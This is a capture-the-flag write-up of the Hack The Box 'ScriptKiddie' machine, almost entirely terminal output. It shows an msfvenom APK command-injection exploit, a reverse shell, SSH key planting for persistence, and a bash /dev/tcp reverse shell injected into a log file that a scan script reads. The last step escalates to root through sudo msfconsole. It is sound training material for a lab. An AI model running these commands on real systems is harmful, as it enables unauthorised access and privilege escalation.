scriptkiddie

Dec 10, 2020 TJNull's List

scriptkiddie

Introduction:

Recon

eneloop@kinetic:…/hackthebox/scriptkiddie/data$ sudo nmap -sS -sV -sC -T4 -O -oN nmap.scriptkiddie.txt 10.129.73.101 Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-07 10:59 EST Nmap scan report for scriptkiddie (10.129.73.101) Host is up (0.014s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 3c:65:6b:c2:df:b9:9d:62:74:27:a7:b8:a9:d3:25:2c (RSA) | 256 b9:a1:78:5d:3c:1b:25:e0:3c:ef:67:8d:71:d3:a3:ec (ECDSA) |_ 256 8b:cf:41:82:c6:ac:ef:91:80:37:7c:c9:45:11:e8:43 (ED25519) 5000/tcp open http Werkzeug httpd 0.16.1 (Python 3.8.5) |_http-server-header: Werkzeug/0.16.1 Python/3.8.5 |_http-title: k1d'5 h4ck3r t00l5 No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: OS:SCAN(V=7.91%E=4%D=2/7%OT=22%CT=1%CU=39686%PV=Y%DS=2%DC=I%G=Y%TM=60200E84 OS:%P=x86_64-pc-linux-gnu)SEQ(SP=103%GCD=1%ISR=10C%TI=Z%CI=Z%II=I%TS=A)OPS( OS:O1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST11 OS:NW7%O6=M54DST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN( OS:R=Y%DF=Y%T=40%W=FAF0%O=M54DNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS OS:%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R= OS:Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F= OS:R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T OS:=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD= OS:S)

Network Distance: 2 hops Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 20.30 seconds

Enumeration

Exploitation

msf6 > use unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection [*] No payload configured, defaulting to cmd/unix/reverse_netcat msf6 exploit(unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection) > options

Module options (exploit/unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection):

Name Current Setting Required Description

FILENAME msf.apk yes The APK file name

Payload options (cmd/unix/reverse_netcat):

Name Current Setting Required Description

LHOST 10.0.0.8 yes The listen address (an interface may be specified) LPORT 4444 yes The listen port

DisablePayloadHandler: True (no handler will be created!)

Exploit target:

Id Name

0 Automatic

msf6 exploit(unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection) > set lhost 10.10.14.124 lhost => 10.10.14.124 msf6 exploit(unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection) > run

(py3) eneloop@kinetic:/oscp/tools/threader3000$ nc -lvnp 4444 listening on [any] 4444 … connect to [10.10.14.124] from (UNKNOWN) [10.129.73.101] 56756 ls -l total 20 drwxrwxr-x 2 kid kid 4096 Feb 3 07:40 pycache -rw-rw-r– 1 kid kid 4408 Feb 3 11:03 app.py drwxrwxr-x 3 kid kid 4096 Feb 3 07:40 static drwxrwxr-x 2 kid kid 4096 Feb 3 07:40 templates whoami kid

pwd /home/kid/html cd .. ls html logs snap user.txt cat user.txt

cat /etc/passwd root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin messagebus:x:103:106::/nonexistent:/usr/sbin/nologin syslog:x:104:110::/home/syslog:/usr/sbin/nologin _apt:x:105:65534::/nonexistent:/usr/sbin/nologin tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin pollinate:x:110:1::/var/cache/pollinate:/bin/false sshd:x:111:65534::/run/sshd:/usr/sbin/nologin systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false kid:x:1000:1000:kid:/home/kid:/bin/bash pwn:x:1001:1001::/home/pwn:/bin/bash cd .ssh /bin/sh: 5: cd: can’t cd to .ssh cd cd .ssh ls -all total 20 drwx—— 2 kid kid 4096 Feb 3 07:40 . drwxr-xr-x 11 kid kid 4096 Feb 3 11:49 .. -rw-rw-r– 1 kid kid 570 Jan 5 20:40 authorized_keys -rw——- 1 kid kid 2602 Jan 5 20:40 id_rsa -rw-r–r– 1 kid kid 570 Jan 5 20:40 id_rsa.pub cat authorized_keys ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCt/MXWipZH4vmE0lLycTlwk0eFcEQilnSCwpQoLA9QEiFAMvopNThWyjGkst6HNPdDvSDlJEfTtW4PaOFAseUICcwuidMXc4xepu1t0hrfv5Wn7SiwQwIDwE0DvRRSpLIr9I0wfjjEPnvc4y7uuMvsf0hegZLMnChgstWWCw99DS5q0YdXxkIC7eKlI90nHyUHL3ULwXDBk6NWhPmJ90yDaFC4iD0yVP3xmjKjl0iotkqbhKhRAD8bUINZ7anXTw4Hb0iF5tMAttB8JbLts5zvgQtYrciKE4Qnl4F+MO5yg3G03s9V69K4R+TXmI4TZKUHfEpNnReQ+73uOqgjH5VeZr0TmSLEszfFfXRcv7t4jxOboYnS+lgR1V2iGHzSle+nAlVLHqlwP5RTtwaOwE0nbykigyz/h4KNCn0rU69fYWSrkcFPYOSm92QKmaMJuXqnycjuqLmHMD2XKSuhlpgD/VmQL34C7pju4h+/78qK50+itG0FCiSy6IRd5DIfTkU= kid@scriptkiddie echo ‘ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC76FPkryUBruyx59tBXWp6/TAN+digwvzzGPr93fMPRd+O4av7leGfwOi7MPiAOOm0mf/UEWvASodSjjwt8cCTlD1GAeHpU3NuXmiEKKtoGRLTjmLPQGZ6w4H3mGVU3DtmGle4s2g0MVilkOqs1n8Ulm1t9sYdOTPfxbs83r4jJfaFjcM3pOD2Br3rrXr//i4BqdT51KmtcFpv3H+LL2LFpBEnO5mPRxbJEJ1cJwnLOAALKLhn3nFXN4VpYUrtE0e1h+ihYIk92NMaSbkP6gyaVBzvdAY6+KxbHE1JEHyyrhaABMQhovenEdiocLujfImSFKy0bxUSlJhqKexyBevhijTxitCm1Br6YvNiyLSfb4+KmdSwg/kicTRdrapFj0+vciCoOWVJHDCtG7rvMprlysZayYRuWV0o6gOd2XhKIAejsy0RBg9PIXN3Ow8UzbpCV9T/JlhNwE5pJq5NPQnLkHfduoSOu3Qat2qUnwjrTAzKvYKV4sGMqx4jXiiLk+M= eneloop@kinetic’ » authorized_keys

cat authorized_keys ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCt/MXWipZH4vmE0lLycTlwk0eFcEQilnSCwpQoLA9QEiFAMvopNThWyjGkst6HNPdDvSDlJEfTtW4PaOFAseUICcwuidMXc4xepu1t0hrfv5Wn7SiwQwIDwE0DvRRSpLIr9I0wfjjEPnvc4y7uuMvsf0hegZLMnChgstWWCw99DS5q0YdXxkIC7eKlI90nHyUHL3ULwXDBk6NWhPmJ90yDaFC4iD0yVP3xmjKjl0iotkqbhKhRAD8bUINZ7anXTw4Hb0iF5tMAttB8JbLts5zvgQtYrciKE4Qnl4F+MO5yg3G03s9V69K4R+TXmI4TZKUHfEpNnReQ+73uOqgjH5VeZr0TmSLEszfFfXRcv7t4jxOboYnS+lgR1V2iGHzSle+nAlVLHqlwP5RTtwaOwE0nbykigyz/h4KNCn0rU69fYWSrkcFPYOSm92QKmaMJuXqnycjuqLmHMD2XKSuhlpgD/VmQL34C7pju4h+/78qK50+itG0FCiSy6IRd5DIfTkU= kid@scriptkiddie ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC76FPkryUBruyx59tBXWp6/TAN+digwvzzGPr93fMPRd+O4av7leGfwOi7MPiAOOm0mf/UEWvASodSjjwt8cCTlD1GAeHpU3NuXmiEKKtoGRLTjmLPQGZ6w4H3mGVU3DtmGle4s2g0MVilkOqs1n8Ulm1t9sYdOTPfxbs83r4jJfaFjcM3pOD2Br3rrXr//i4BqdT51KmtcFpv3H+LL2LFpBEnO5mPRxbJEJ1cJwnLOAALKLhn3nFXN4VpYUrtE0e1h+ihYIk92NMaSbkP6gyaVBzvdAY6+KxbHE1JEHyyrhaABMQhovenEdiocLujfImSFKy0bxUSlJhqKexyBevhijTxitCm1Br6YvNiyLSfb4+KmdSwg/kicTRdrapFj0+vciCoOWVJHDCtG7rvMprlysZayYRuWV0o6gOd2XhKIAejsy0RBg9PIXN3Ow8UzbpCV9T/JlhNwE5pJq5NPQnLkHfduoSOu3Qat2qUnwjrTAzKvYKV4sGMqx4jXiiLk+M= eneloop@kinetic

root@kinetic:/dev/shm# ssh -i id-temp kid@scriptkiddie Welcome to Ubuntu 20.04.1 LTS (GNU/Linux 5.4.0-65-generic x86_64)

Documentation: https://help.ubuntu.com
Management: https://landscape.canonical.com
Support: https://ubuntu.com/advantage

System information as of Sun Feb 7 19:24:07 UTC 2021

System load: 0.08 Usage of /: 36.7% of 17.59GB Memory usage: 10% Swap usage: 0% Processes: 225 Users logged in: 0 IPv4 address for ens160: 10.129.73.101 IPv6 address for ens160: dead:beef::250:56ff:feb9:f51a

1 update can be installed immediately. 1 of these updates is a security update. To see these additional updates run: apt list –upgradable

Last login: Wed Feb 3 12:07:35 2021 from 10.10.14.4 kid@scriptkiddie:~$

Post-exploit/PrivEsc

kid@scriptkiddie:/tmp$ wget http://10.10.14.38:8000/linpeas.sh –2021-02-13 14:08:32– http://10.10.14.38:8000/linpeas.sh Connecting to 10.10.14.38:8000… connected. HTTP request sent, awaiting response… 200 OK Length: 313316 (306K) [text/x-sh] Saving to: ‘linpeas.sh’

linpeas.sh 100%[==============================================>] 305.97K –.-KB/s in 0.08s

kid@scriptkiddie:/home/pwn$ cat scanlosers.sh #!/bin/bash

log=/home/kid/logs/hackers

cd /home/pwn/ cat $log | cut -d' ' -f3- | sort -u | while read ip; do sh -c “nmap –top-ports 10 -oN recon/${ip}.nmap ${ip} 2>&1 >/dev/null” & done

if [[ $(wc -l < $log) -gt 0 ]]; then echo -n > $log; fi kid@scriptkiddie:/home/pwn$ kid@scriptkiddie:/home/pwn$ kid@scriptkiddie:/home/pwn$ cat /tmp/test ABC ABC “;echo ‘hi kid’>/tmp/hikid.txt"adasdsd eadadasdasdas asdasdasfasdf wdawdawdawd kid@scriptkiddie:/home/pwn$ cat /tmp/test | cut -d' ' -f3- “;echo ‘hi kid’>/tmp/hikid.txt"adasdsd eadadasdasdas asdasdasfasdf wdawdawdawd kid@scriptkiddie:/home/pwn$

kid@scriptkiddie:/home/pwn$ cat scanlosers.sh #!/bin/bash

log=/home/kid/logs/hackers

cd /home/pwn/ cat $log | cut -d' ' -f3- | sort -u | while read ip; do sh -c “nmap –top-ports 10 -oN recon/${ip}.nmap ${ip} 2>&1 >/dev/null” & done

if [[ $(wc -l < $log) -gt 0 ]]; then echo -n > $log; fi kid@scriptkiddie:/home/pwn$ ls recon scanlosers.sh kid@scriptkiddie:/home/pwn$ echo “ABC DEF ;/bin/bash -c ‘bash -i >& /dev/tcp/10.10.14.38/8080 0>&1’ #” »/home/kid/logs/hackers kid@scriptkiddie:/home/pwn$

py3) eneloop@kinetic:…/tools/PEAS/linPEAS$ nc -lvnp 8080 listening on [any] 8080 … connect to [10.10.14.38] from (UNKNOWN) [10.10.10.226] 43842 bash: cannot set terminal process group (864): Inappropriate ioctl for device bash: no job control in this shell

pwn@scriptkiddie:~/.ssh$ sudo -l sudo -l Matching Defaults entries for pwn on scriptkiddie: env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin

User pwn may run the following commands on scriptkiddie: (root) NOPASSWD: /opt/metasploit-framework-6.0.9/msfconsole

pwn@scriptkiddie:~/.ssh$ sudo /opt/metasploit-framework-6.0.9/msfconsole sudo /opt/metasploit-framework-6.0.9/msfconsole

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %% %%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %% %% %%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %% % %%%%%%%% %%%%%%%%%%% https://metasploit.com %%%%%%%%%%%%%%%%%%%%%%%% %% %% %%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %% %%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%% %%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%% %% %%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%% %%%%% %%%% %% %% % %% %% %%%%% % %%%% %% %%%%%% %% %%%% %% %% % %%% %%%% %%%% %% %%%% %%%% %% %% %% %%% %% %%% %%%%% %%%% %%%%%% %% %%%%%% %%%% %%% %%%% %% %% %%% %%% %% %% %%%%% %%%%%%%%%%%% %%%% %%%%% %% %% % %% %%%% %%%% %%% %%% % %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%% %%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

   =[ metasploit v6.0.9-dev                           ]

– –=[ 2069 exploits - 1122 auxiliary - 352 post ]
– –=[ 592 payloads - 45 encoders - 10 nops ]
– –=[ 7 evasion ]

Metasploit tip: You can use help to view all available commands

msf6 > cd /root cd /root msf6 > ls
ls [*] exec: ls

root.txt snap msf6 > cat root.txt
cat root.txt [*] exec: cat root.txt

Notes: